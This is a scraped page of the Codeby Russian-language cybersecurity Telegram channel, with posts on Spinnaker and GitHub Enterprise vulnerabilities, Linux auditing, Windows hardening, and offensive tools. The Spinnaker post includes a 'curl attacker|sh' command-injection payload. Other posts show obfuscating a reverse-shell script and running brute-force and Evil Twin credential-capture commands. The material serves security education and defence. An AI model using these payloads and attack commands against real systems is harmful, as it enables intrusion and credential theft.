Codeby

Public

Просмотреть канал

Не можете присоединиться? @codeby_sec

36.4k Участники

Обновлено: May 12, 2026 at 12:25 AM

Codeby

Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina

@codeby_sec is a dedicated channel for codebyacademy and clckruxg99c with regular updates in Кодинг и программирование

Рейтинг

Глобальный рейтинг

#456

Рейтинг по языку

#45

Рейтинг по категории

#23

-1

Рост участников (Последние 12 дней)

Всего: 36.4K

Рост за 24ч: +0 0%

Последние посты

Codeby

11 мая 2026 г., 23:27

📷 Photo

Две девятки по CVSS в Spinnaker: как обычная учётка превращается в shell на production

Spinnaker — платформа для управления деплоями от Netflix, которую используют Google, Cisco и сотни enterprise-команд. В апреле 2026 года в ней нашли две критические уязвимости с оценкой CVSS 9.9. Обе эксплуатируются пользователем без привилегий — достаточно просто быть аутентифицированным.

🔥 CVE-2026-32604 — command injection в clouddriver. Поле version из JSON-запроса к эндпоинту PUT /artifacts/fetch конкатенируется прямо в shell-команду без какой-либо санитизации. Буквально: clouddriver берёт пользовательский ввод и подставляет его в sh -c "git clone --branch YOUR_INPUT...". Точка с запятой в поле version — и вместо клонирования репозитория clouddriver выполняет произвольный код. Никаких специальных ролей не нужно — ни WRITE на application, ни EXECUTE на pipeline.

🔑 CVE-2026-32613 — SpEL-инъекция в Echo, сервисе нотификаций и триггеров. Spring Expression Language позволяет выполнить произвольный Java-код на сервере. Тут нужен WRITE на одно application, но результат тот же — полный RCE.

Почему это так больно? Архитектура Spinnaker построена на модели доверия периметру: Gate аутентифицирует запросы на входе, а дальше все 10+ микросервисов общаются друг с другом внутри Kubernetes-кластера без проверки прав. Получил shell на clouddriver — а там лежат production-credentials к AWS, GCP, Azure. Полностью доверенная зона, без токенов, без вопросов.

⚡️ Цепочка эксплуатации CVE-2026-32604 выглядит до обидного просто:

1. Аутентифицироваться в Gate (любая учётка)
2. Запросить GET /artifacts/credentials — эндпоинт отдаёт список всех artifact accounts без проверки ролей
3. Найти аккаунт с типом TOKEN или USER_PASS
4. Отправить PUT /artifacts/fetch с payload вида "version": "main; curl attacker|sh;"

Всё. Command injection уровня «первый семестр secure coding», а CVSS — 9.9. Clouddriver выполнит ваш скрипт с правами пода, в котором хранятся ключи от production-облаков.

Что делать прямо сейчас:

• Обновиться до Spinnaker 2026.0.1, 2025.4.2 или 2025.3.2
• Проверить, не торчит ли Gate наружу (ZeroPath находила публичные инстансы)
• Аудит artifact accounts — убрать неиспользуемые TOKEN/USER_PASS аккаунты
• Внедрить network policies между микросервисами — модель «доверяй всем внутри кластера» в 2026 году уже не работает

В полной статье — разбор обоих векторов до уровня конкретных строк кода, post-exploitation и то, что видит и не видит blue team.

https://codeby.net/threads/cve-2026-32604-i-cve-2026-32613-rce-v-spinnaker-ot-low-priv-autentifikatsii-do-shell-na-clouddriver-i-echo.92955/

2,050

Codeby

11 мая 2026 г., 23:27

📷 Photo

🔎 Auditd: как Linux отслеживает всё, что происходит в системе

Auditd — это встроенная система аудита в Linux, которая записывает кто, что и когда сделал в системе.
Если тебе нужно понять, *кто удалил файл*, *кто получил доступ к /etc/shadow* или *когда изменили конфиг* — это как раз его задача.

❓ Как это работает
Auditd состоит из нескольких частей:
▶️ auditd (демон) — собирает и пишет логи
▶️ auditctl — добавляет правила (что именно отслеживать)
▶️ ausearch / aureport — помогает анализировать логи

🧠 Что можно отслеживать
Auditd умеет фиксировать почти всё:
🔁 доступ к файлам и каталогам
🪧 действия пользователей
❗️ попытки входа
💻 запуск команд
🧾 попытки аутентификации

⬇️ Установка
В большинстве дистрибутивов Auditd доступен из стандартных репозиториев:

Debian / Ubuntu:
apt install auditd audispd-plugins

RHEL / CentOS:
yum install audit

После установки сервис обычно запускается автоматически. При необходимости:
systemctl enable auditd
systemctl start auditd

🎯 Пример использования
Добавим правило для отслеживания изменений файла /etc/passwd:
auditctl -w /etc/passwd -p wa -k passwd_changes

Параметры:
-w — указание файла для наблюдения
-p wa — отслеживание записи (write) и изменения атрибутов (attribute)
-k — ключ для удобного поиска событий

🛡 Расположение логов

Журналы аудита по умолчанию сохраняются в:
/var/log/audit/audit.log

Для анализа рекомендуется использовать:
* ausearch — выборка событий
* aureport — генерация отчетов

#linux #auditd #cybersecurity #infosec #sysadmin #logging #security #devops

🔗 https://t.me/addlist 🔁 https://t.me/addlist 🪧 https://t.me/CodebyAcademyBot

Codeby

11 мая 2026 г., 23:27

📷 Photo

120 машин с Windows 10 — и ни одна не готова к EOL

На трёх последних внутренних пентестах — банк, производство, госструктура — картина одинаковая: дефолтные GPO, открытый SMBv1, LSASS без защиты. Mimikatz снимал хеши за секунды, а Pass-the-Hash давал lateral movement до контроллера домена за минуты. И это ещё до окончания поддержки.

После 14 октября 2025 каждая новая CVE в ядре Windows 10 становится перманентным 0-day. Microsoft патчит Windows 11 — diff между версиями публикуется открыто. Злоумышленник берёт октябрьский Patch Tuesday для Windows 11, reverse-diff'ит и пишет эксплойт для «десятки», где fix не появится никогда. Это не теория — после EOL Windows 7 массовая эксплуатация началась за считанные месяцы.

🔍 Что проверить в первую очередь

Вот шесть точек, которые я проверяю и как атакующий, и как автор рекомендаций в отчёте:

• RunAsPPL в реестре — значение 0 или отсутствует? Mimikatz снимет хеши без усилий
• EnableSMB1Protocol = True? Хост открыт для relay-атак и целого класса RCE
• UAC level = 5 (дефолт)? Обход через десятки публичных техник
• Credential Guard не активен? NTLM-хеши лежат в памяти открытым текстом
• PowerShell в режиме FullLanguage? Любой payload выполнится без ограничений
• WDigest не отключён? Пароли хранятся в памяти в открытом виде даже при включённом RunAsPPL

⚙️ Три быстрых действия, которые поднимают планку атаки на порядок

1. Включить RunAsPPL: одна строка в реестре, перезагрузка — и стандартный Mimikatz ловит ошибку доступа. Обход через BYOVD требует kernel-level доступа и конкретного уязвимого драйвера. Совсем другой уровень сложности.

2. Отключить WDigest: ключ UseLogonCredential = 0. Без этого пароли валяются в памяти в открытом виде. Видел на реальном проекте — RunAsPPL включили, WDigest забыли. Половина работы впустую.

3. Убить SMBv1: Set-SmbServerConfiguration -EnableSMB1Protocol $false. Протокол из 2006 года не нужен в 2025-м. Если что-то сломается — значит в сети есть legacy-система, которая сама по себе проблема.

🛡 Важный нюанс: сигнатуры Defender будут приходить до 2028 года. Но антивирус ловит известные вредоносы, а не закрывает дыру в win32k.sys или ntoskrnl.exe. Это как замок на двери с дырой размером с кулак.

Для автоматизации аудита — HardeningKitty прогоняет хост по CIS Benchmark, а PingCastle сканирует AD целиком.

Полный чеклист с командами, GPO-настройками и привязкой к MITRE ATT&CK — в статье на форуме.

https://codeby.net/threads/khardening-windows-10-11-posle-okonchaniya-podderzhki-cheklist-dlya-pentestera-i-administratora.92954/

Codeby

11 мая 2026 г., 23:27

📷 Photo

🚗 Новый профиль HackerLab: прогресс, достижения и активность

Мы переработали профиль пользователя на HackerLab.

Теперь это не просто страница с базовой статистикой, а полноценная карта прогресса: какие задания уже решены, в каких направлениях пользователь силён, где есть зоны роста и куда двигаться дальше.

➕ Что добавили:
— общий прогресс по заданиям, курсам, пентест-машинам и PRO-лабам
— компетенции по направлениям
— сильные стороны и зоны роста
— история активности

🏆 И новая механика — достижения

Достижения открываются за конкретные шаги на платформе: первое решённое задание, новые рубежи, стабильное движение по таскам.

Теперь прогресс не растворяется в общей статистике - он остаётся в профиле и показывает путь пользователя на платформе.

🔗 https://hackerlab.pro/profile

2,530

Codeby

11 мая 2026 г., 23:27

📷 Photo

GetNet: что за конференция и почему на неё идут не за стикерами

Коллеги, 15 мая пройдёт GetNet — конференция для сетевиков и сисадминов среднего бизнеса. Москва + онлайн. Без enterprise-космолётов и «успешного успеха», только прикладные доклады от инженеров, которые сами всё это крутят в продакшене.

В отличие от классических «вендорских» ивентов, где два трека и один венчурный питч, здесь программа собрана под реальные боли админов прямо сейчас.

Что в программе:
• Импортозамещение: как выбрать оборудование, чтобы потом не пожалеть (Владислав Хлебников, Совкомбанк Технологии) — методология тестирования и поиска багов до закупки
• NGFW: как не купить цифры вместо безопасности (Александр Бирюков, Positive Technologies) — честный разбор архитектуры межсетевого экрана, который на независимых тестах выжал ×2,3 от паспорта
• Автоматизация управления сетью — от скриптов до вменяемых решений
• Мониторинг и надёжность — чтобы не жить по алертам из чата в три ночи
• VPN, блокировки, DPI-обход — как выживать админу, когда гайки закручивают всё сильнее

Только практикующие инженеры, только реальные кейсы, инструменты, которые можно забрать и применить сразу.

📍 Очно в Москве, онлайн-трансляция.
https://gn26.ru/cbsconfmay26

#GetNet #network #конференция

Codeby

11 мая 2026 г., 23:27

📷 Photo

🏃 psobf v2.0.1

Инструмент для обфускации PoSh скриптов, написан на 🖼️ Go

Установка:

go install github.com/TaurusOmar/psobf/v2/cmd/[email protected]

Запуск:

psobf -i .\revsh.ps1 -o revsh_obf.ps1 -level 1

На вход подаем оригинальный скрипт, на выход получаем обфусцированный и указываем уровень от 1 до 6
На последнем уровне используется AES шифрование

Примеры:

# Original
Write-Host "Hello, World!"

# Obfuscated level 1
$rukp = $([char[]](87,114,105,116,101,45,72,111,115,116,32,34,72,101,108,108,111,44,32,87,111,114,108,100,33,34) -join ''); . ([ScriptBlock]::Create($rukp))

# Original
Write-Host "Hello, World!"

# Obfuscated level 2
$rukp = 'V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI='; $rukp = [Text. Encoding]::UTF8. GetString([Convert]::FromBase64String($rukp)); . ([ScriptBlock]::Create($rukp))

# Original
Write-Host "Hello, World!"

# Obfuscated level 3
$rukp = 'V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI='; $tuez = [Convert]::FromBase64String($rukp); $tuez = [Text. Encoding]::UTF8. GetString($tuez); . ([ScriptBlock]::Create($tuez))

# Original
Write-Host "Hello, World!"

# Obfuscated level 4
$c='H4sIAAAAAAAA/wovyixJ1fXILy5RUPJIzcnJ11EIzy/KSVFUAgQAAP//PM5PshoAAAA=';$b=[Convert]::FromBase64String($c);$m=New-Object IO. MemoryStream(,$b);$g=New-Object IO. Compression. GzipStream($m,[IO. Compression. CompressionMode]::Decompress);$r=New-Object IO. StreamReader($g);$rukp=$r. ReadToEnd();. ([ScriptBlock]::Create($rukp))

# Original
Write-Host "Hello, World!"

# Obfuscated level 5
$rukp = @('Write-Host "He','llo, World!','"'); $rukp = $rukp -join ''; . ([ScriptBlock]::Create($rukp))

💻 https://github.com/TaurusOmar/psobf

#soft #powershell #obfuscator #psobf

Codeby

11 мая 2026 г., 23:27

📷 Photo

Друзья, напоминаем, на каких курсах начинается обучение в мае🚗

Старт 4 мая:
⏺️Курс https://codeby.academy/course/kurs-osnovy-kiberbezopasnosti-prakticheskij-kurs-dlya-novichkov/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_osnovy_may_26&utm_content=codeby_channel&utm_term=site https://codeby.academy/course/kurs-osnovy-kiberbezopasnosti-prakticheskij-kurs-dlya-novichkov/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_osnovy_may_26&utm_content=codeby_channel&utm_term=site https://codeby.academy/course/kurs-osnovy-kiberbezopasnosti-prakticheskij-kurs-dlya-novichkov/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_osnovy_may_26&utm_content=codeby_channel&utm_term=site освоите ключевые навыки информационной безопасности: от основ Linux до проведения пентестов.

Старт 18 мая:
⏺️Курс https://codeby.academy/course/kurs-professia-revers-ingener/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_professia_revers_ingener_may_26&utm_content=codeby_channel&utm_term=site https://codeby.academy/course/kurs-professia-revers-ingener/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_professia_revers_ingener_may_26&utm_content=codeby_channel&utm_term=site https://codeby.academy/course/kurs-professia-revers-ingener/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_professia_revers_ingener_may_26&utm_content=codeby_channel&utm_term=site — научитесь анализировать бинарный код на уровне ассемблера, разбирать исполняемые файлы (PE, ELF, APK), исследовать вредоносное ПО и обходить антиотладку с протекторами.

Старт 25 мая:
⏺️Курс https://codeby.academy/course/kurs-speczialist-po-testirovaniyu-na-proniknovenie-v-informaczionnye-sistemy/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_professia_pentester_may_26&utm_content=codeby_channel&utm_term=site https://codeby.academy/course/kurs-speczialist-po-testirovaniyu-na-proniknovenie-v-informaczionnye-sistemy/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_professia_pentester_may_26&utm_content=codeby_channel&utm_term=site https://codeby.academy/course/kurs-speczialist-po-testirovaniyu-na-proniknovenie-v-informaczionnye-sistemy/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_professia_pentester_may_26&utm_content=codeby_channel&utm_term=site — учимся эксплуатировать онлайн-уязвимости и обходить антивирусы. Изучаем инструменты: сканеры, Bash-скрипты, пентест AD.
⏺️Курс https://codeby.academy/course/kurs-professiya-appsec-inzhener/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_professiya_appsec_may_26&utm_content=codeby_channel&utm_term=site https://codeby.academy/course/kurs-professiya-appsec-inzhener/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_professiya_appsec_may_26&utm_content=codeby_channel&utm_term=site https://codeby.academy/course/kurs-professiya-appsec-inzhener/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_professiya_appsec_may_26&utm_content=codeby_channel&utm_term=site — научитесь анализировать код, находить уязвимости, строить безопасную архитектуру и применять OWASP-практики на реальных проектах.

✉️ Запишитесь у нашего менеджера https://t.me/CodebyAcademyBot

Или узнайте подробности и программы курсов на нашем➡️ https://codeby.academy/courses/?utm_source=tg&utm_medium=post&utm_campaign=raspisanie_courses_may_26&utm_content=codeby_channel&utm_term=site

Codeby

11 мая 2026 г., 23:27

pinned a photo

Codeby

11 мая 2026 г., 23:27

📷 Photo

Один git push — и миллионы чужих репозиториев у тебя в кармане

В марте 2026 года команда Wiz Research отправила репорт в GitHub Bug Bounty. Через 40 минут уязвимость подтвердили, через два часа на http://github.com/ выкатили патч. Скорость реакции говорит о масштабе проблемы: один crafted push option давал RCE на бэкенд-серверах и доступ к публичным и приватным репозиториям чужих организаций. На момент раскрытия 88% self-hosted GHES-инстансов оставались уязвимы.

Но самое интересное тут — не сама дыра, а то, как её нашли.

🔍 Архитектура, которая подвела

Когда ты делаешь git push на GitHub через SSH, запрос проходит цепочку из четырёх сервисов: babeld (git-прокси) → gitauth (аутентификация) → gitrpcd (внутренний RPC) → pre-receive hook. Каждый написан на своём языке. И каждый безусловно доверяет предыдущему.

Связующее звено между ними — заголовок X-Stat. Формат примитивный: пары key=value, разделённые точкой с запятой. Парсинг — тривиальный split. А дальше — деталь, на которой всё держится: если ключ встречается дважды, второе значение тихо перезаписывает первое. Без предупреждений, без логов. Last-write-wins.

Push options — стандартная фича git-протокола (git push -o ). babeld кодирует их как поля в X-Stat. Пользователь контролирует значение. Точка с запятой не экранируется. Значит, через push option можно инжектить произвольные поля в X-Stat, перезаписывая security-критичные параметры — и получить command injection.

⚙️ Как AI помог — и где не помог

Wiz копали GHES и раньше, но объём закрытых бинарников делал полноценный аудит нерентабельным. Десятки скомпилированных сервисов без исходников — ручной реверс каждого в IDA Pro занял бы месяцы.

Прорыв случился благодаря IDA MCP — AI-тулингу для автоматизации реверс-инжиниринга. Восстановление типов, идентификация функций, реконструкция внутренних протоколов — рутина, которая раньше занимала недели на один бинарник, ускорилась на порядок.

Но вот что важно: AI ускорил рутину, а не нашёл баг. Понимание, что точка с запятой в shared-формате — вектор инъекции, что last-write-wins превращает field injection в override security-полей, что конкретное поле rails_env управляет sandbox-режимом — это чистый domain expertise. AI не вытянет такое сам: ему не хватает контекста «а что будет, если парсер встретит два одинаковых ключа».

🎯 Для практикующих исследователей: аналогичный подход работает с любым продуктом, который поставляется как VM-образ или контейнер — GitLab Omnibus, Bitbucket Server, Jenkins. Для SaaS-only — вектор закрыт.

Полный разбор цепочки эксплуатации, формата X-Stat и методологии реверса — в статье на форуме.

https://codeby.net/threads/github-enterprise-rce-cve-2026-3854-ot-reversa-zakrytykh-binarnikov-do-polnoi-komprometatsii-servera.92950/

Codeby

11 мая 2026 г., 23:27

📷 Photo

Dracnmap

Dracnmap — это программа с открытым исходным кодом, используемая для анализа сети и сбора информации с помощью nmap. Команда nmap имеет множество опций, которые делают утилиту более надежной и сложной для освоения новыми пользователями. Поэтому Dracnmap разработан для быстрого сканирования с использованием скриптового механизма nmap, а nmap может выполнять различные методы автоматического сканирования с помощью расширенных команд.

📐Возможности:
📉Регулярное сканирование
📉Сканирование нескольких IP-адресов
📉Сканирование версии ОС и трассировка маршрута
📉Выявление Firewall
🖱Обход Firewall

⬇️Установка:
0️⃣Клонируем репозиторий и переходим в рабочую директорию:
git clone https://github.com/Screetsec/Dracnmap.git
cd Dracnmap
1️⃣Даём право only execute для владельца.
chmod 100 dracnmap-v2.2.sh

⛓️‍💥Запуск:
▶️Запуск утилиты:
sudo bash dracnmap-v2.2.sh

#web #wapt #nmap

🔗 https://t.me/addlist 🔁 https://t.me/addlist 🪧 https://t.me/CodebyAcademyBot

Codeby

30 мар. 2026 г., 13:33

📷 Photo

🍯 https://github.com/MHaggis/ADTrapper — инструмент для обнаружения атак в Active Directory с помощью honeypot-аккаунтов

ADTrapper — open source-инструмент для обнаружения атак внутри инфраструктуры Microsoft Active Directory. Он создаёт honeypot-объекты и ловушки в AD, которые позволяют выявлять злоумышленников во время разведки, lateral movement и попыток повышения привилегий.

Идея инструмента проста: создать в каталоге приманки, которые выглядят как реальные учётные записи или ресурсы. Любая попытка взаимодействия с такими объектами практически всегда означает подозрительную активность.

🪧 Основные возможности ADTrapper
▶️ Honeypot-учётные записи — создание ловушек в Active Directory для обнаружения злоумышленников.
▶️ Обнаружение reconnaissance-активности — выявляет попытки сканирования и enumeration AD.
▶️ Отслеживание lateral movement — реагирует на попытки использования trap-учёток.
▶️ Интеграция с логированием — события можно отправлять в SIEM или системы мониторинга.
▶️ Минимальное влияние на инфраструктуру — ловушки не мешают работе пользователей.

🕸 Как работает ADTrapper
ADTrapper разворачивает специальные honeypot-объекты внутри Active Directory:
⏺️фальшивые сервисные аккаунты
⏺️приманки-администраторы
⏺️ложные ресурсы или группы

Когда злоумышленник выполняет разведку например через:
⏺️BloodHound
⏺️LDAP enumeration
⏺️AD reconnaissance
он может обнаружить эти объекты.

Любое взаимодействие с ними генерирует событие безопасности, которое можно использовать для обнаружения атаки.

💻 Базовый сценарий использования
Клонирование репозитория
git clone https://github.com/MHaggis/ADTrapper.git
cd ADTrapper
cp env.example .env

Запуск инструмента
./deploy.sh

docker-compose up -d
docker-compose exec -T database psql -U postgres < supabase/migrations/0001_simple_setup.sql
После запуска веб-сервис будет доступен по адресу http://localhost:3000

#activedirectory #blueteam #defense #honeypot #security #tool

🔗 https://t.me/addlist 🔁 https://t.me/addlist 🪧 https://t.me/CodebyAcademyBot

Codeby

30 мар. 2026 г., 13:33

😄😀😂🙂🙃

С вечера пятницы у нас наблюдаются технические проблемы с Telegram: часть входящих сообщений может не доходить до менеджеров или отображаться с задержкой.

Мы переживаем, что могли пропустить ваши вопросы 🙏

Если вы писали нам в Telegram с пятницы вечера и не получили ответа — пожалуйста, продублируйте сообщение на почту:

📩 [email protected]

Если вы уже общались с конкретным менеджером, можно написать напрямую ему на рабочую почту.

Мы обязательно ответим как можно быстрее.
Также на время решения проблемы рекомендуем использовать email для всех срочных вопросов.

Спасибо за понимание 🚗

2,850

Codeby

30 мар. 2026 г., 13:33

pinned «😄😀😂🙂🙃 С вечера пятницы у нас наблюдаются технические проблемы с Telegram: часть входящих сообщений может не доходить до менеджеров или отображаться с задержкой. Мы переживаем, что могли пропустить ваши вопросы 🙏 Если вы писали нам в Telegram с пятницы вечера…»

Codeby

30 мар. 2026 г., 13:33

📷 Photo

BruteForceAI - метод перебора с помощью нейросети🧠

BruteForceAI — это инструмент для тестирования на проникновение, который преобразует традиционные атаки методом перебора, интегрируя LLM для интеллектуального анализа форм. Инструмент автоматически идентифицирует селекторы форм входа в систему с помощью ИИ, а затем выполняет сложные многопоточные атаки с использованием моделей поведения, сходных с человеческими.

📐Основные особенности
📉Многопоточное выполнение с синхронизированными задержками
📉Режимы атаки «Брутфорс» и «Распыление паролей»
📉Имитация человеческого чувства времени с учетом дрожания и случайности
📉User-Agent для лучшего обхода защиты
📉Комплексное ведение журналов с использованием базы данных SQLite.

⬇️Установка:
0️⃣Клонирование репозитория:
git clone https://github.com/MorDavid/BruteForceAI
cd BruteForceAI/

1️⃣Установка зависимостей:
pip install -r requirements.txt

2️⃣Установка LLM модели:
curl -fsSL https://ollama.ai/install.sh | sh
ollama pull llama3.2:3b
Это всё бесплатно, не требует регистрации или API ключей

3️⃣Создаём список urls адресов:
vim urls.txt
➡️ https://authenticationtest.com/simpleFormAuth/

⛓️‍💥Запуск:
➡️Анализ форм авторизации:
python BruteForceAI.py analyze --urls urls.txt --llm-provider ollama
➡️Исполнение атаки:
python BruteForceAI.py attack --urls urls.txt --username users.txt --passwords passwords.txt --threads 10

#pentest #bugbounty #bruteforce #AI

🔗 https://t.me/addlist 🔁 https://t.me/addlist 🪧 https://t.me/CodebyAcademyBot

Codeby

30 мар. 2026 г., 13:33

📷 Photo

🌐 https://github.com/s0lst1c3/eaphammer — инструмент для проведения таргетированных атак типа Evil Twin на сети WPA2-Enterprise.

Предназначен для использования в рамках полноценных аудитов беспроводной безопасности и Red Team-операций, поэтому основной акцент сделан на простом и удобном интерфейсе, который позволяет выполнять мощные атаки на беспроводные сети с минимальной ручной настройкой.

Атака Evil Twin заключается в том, что злоумышленник создает фальшивую точку доступа Wi-Fi, которая имеет такое же название (SSID), как и легитимная точка, но с лучшим уровнем сигнала. Пользователи, подключаясь к этой сети, не осознают, что подключаются не к защищенной сети, а к точке доступа злоумышленника. Это позволяет злоумышленникам перехватывать данные, передаваемые между устройством и точкой доступа, включая пароли, логины и другие конфиденциальные данные.

⬇️ Установка возможна как через пакетный менеджер sudo apt install eaphammer, так и из исходного кода:
git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Возможности
⏺️Перехват RADIUS-учётных данных из сетей WPA-EAP и WPA2-EAP;
⏺️Проведение атак с использованием captive portal;
⏺️Встроенная интеграция с Responder;
⏺️Для большинства атак не требуется ручная настройка;
⏺️Встроенный HTTP-сервер для атак типа Hostile Portal;
⏺️Быстрые и автоматизированные PMKID-атаки против PSK-сетей с использованием hcxtools;
⏺️Выполнение password spraying по множеству пользователей в рамках одного ESSID.

Поддерживает следующие методы EAP: EAP-PEAP/MSCHAPv2, EAP-PEAP/GTC, EAP-PEAP/MD5, EAP-TTLS/PAP, EAP-TTLS/MSCHAP, EAP-TTLS/MSCHAPv2, EAP-TTLS/MSCHAPv2 (без EAP), EAP-TTLS/CHAP, EAP-TTLS/MD5, EAP-TTLS/GTC, EAP-MD5.

⛓️‍💥Использование
# Генерация сертификата
./eaphammer --cert-wizard

# Запуск атаки
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

#tools #wifi #pentesting

🔗 https://t.me/addlist 🔁 https://t.me/addlist 🪧 https://t.me/CodebyAcademyBot

Codeby

30 мар. 2026 г., 13:33

📷 Photo

https://github.com/praetorian-inc/titus — быстрый сканер секретов в коде и Git

Titus — инструмент для поиска утёкших секретов: API-ключей, токенов, паролей и других учетных данных в исходном коде, файлах и Git-истории.

Сканер использует 487 правил детекции и поддерживает проверку найденных ключей через API сервисов, чтобы определить активны ли они

Основные возможности
📉 Поиск секретов в коде, файлах и Git-истории
📉 Высокая скорость благодаря Hyperscan / Vectorscan
📉 487 правил для обнаружения ключей популярных сервисов
📉 Проверка валидности найденных секретов
📉 Извлечение секретов из бинарных файлов (PDF, Office, архивы)
📉 Сканирование GitHub и GitLab репозиториев
🖱 Интеграция с Burp Suite и Chrome

⬇️Установка
git clone https://github.com/praetorian-inc/titus
cd titus
make build

⛓️‍💥Примеры использования
▶️Сканирование файла:
titus scan file.txt

▶️Сканирование директории:
titus scan ./project

▶️Сканирование Git-репозитория:
titus scan --git path/to/repo

▶️Проверка найденных секретов:
titus scan ./code --validate

Titus — быстрый и удобный инструмент для поиска утёкших API-ключей и токенов, который хорошо подходит для pentest, bug bounty и DevSecOps-процессов.

#pentest #bugbounty #devsecops #secretscanner

🔗 https://t.me/addlist 🔁 https://t.me/addlist 🪧 https://t.me/CodebyAcademyBot

Codeby

30 мар. 2026 г., 13:33

📷 Photo

🔁 Пятничный опрос
Сегодня проверим, насколько хорошо ты понимаешь Boolean-based Blind SQLi.

❓ Вопрос простой:
что из предложенного — именно этот тип инъекции?

Подсказка:
Boolean-based Blind SQLi — это тип SQL-инъекции, при котором атакующий определяет истинность условий (TRUE/FALSE) по косвенным признакам ответа приложения (например, изменению страницы), без явного вывода данных или ошибок.

3,360

Codeby

30 мар. 2026 г., 13:33

[poll]

3,650

Codeby

30 мар. 2026 г., 13:33

📷 Photo

🚩 Новые задания на платформе HackerLab!

🔎 Категория OSINT — https://hackerlab.pro/categories/osint/1ee77240-6af1-4b19-a198-35ea2866b1a3

Приятного хакинга!

3,240

Codeby

30 мар. 2026 г., 13:33

pinned a photo

Showing 20 of 20 posts

No more posts

Рейтинг

Требуется вход

Отзывы пользователей (0)

Пока нет отзывов. Будьте первым, кто поделится своим опытом!

Codeby

Codeby

Рейтинг

Рост участников (Последние 12 дней)

Последние посты

Рейтинг

Отзывы пользователей (0)

Похожие каналы Telegram

Albinasummer

PM работа. Проектные менеджеры

Русский Модный Код

Литературный коД

Компьютерная математика Weekly

AI Projects

ReLab Family

Книги по программированию

Похожие каналы Telegram

Albinasummer

PM работа. Проектные менеджеры

Русский Модный Код

Литературный коД

Компьютерная математика Weekly

AI Projects

ReLab Family

Книги по программированию

Отзывы пользователей (0)

Последние посты